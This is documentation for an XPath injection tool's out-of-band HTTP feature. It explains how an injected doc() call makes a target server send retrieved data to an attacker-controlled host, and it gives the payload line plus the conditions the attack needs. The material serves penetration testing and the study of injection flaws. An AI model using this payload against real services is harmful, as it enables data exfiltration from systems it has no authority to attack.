Out of bounds HTTP server

The out-of-bounds (OOB) server that xcat provides is a powerful way of drastically speeding up retrieval.

It works by abusing the XPath doc() function, which is used to read arbitrary local or network files. Using this method xcat will instruct the service to load an XML file from it's server, passing any data it wishes to retrieve in the query string:

doc(concat('http://[external-host]/data/123?d=', func.encode_for_uri(TARGET EXPRESSION)))

This requires that:

  • You have an externally routable IP that the target server can connect to
  • The XPath library is configured to load external documents (many default configurations allow this)
  • The port is not blocked by any firewalls

To enable this feature simply pass the --oob flag to any xcat command.

The --oob flag should in a host:port format, and it is up to you to find a combination that works. To test this combination run xcat detect and check that the oob-http feature is enabled.

This can also be used to perform automated XXE attacks, however this functionality is currently not fully working.


This shows xcat connecting to a local server and using the --oob flag to retrieve the document much faster than other methods.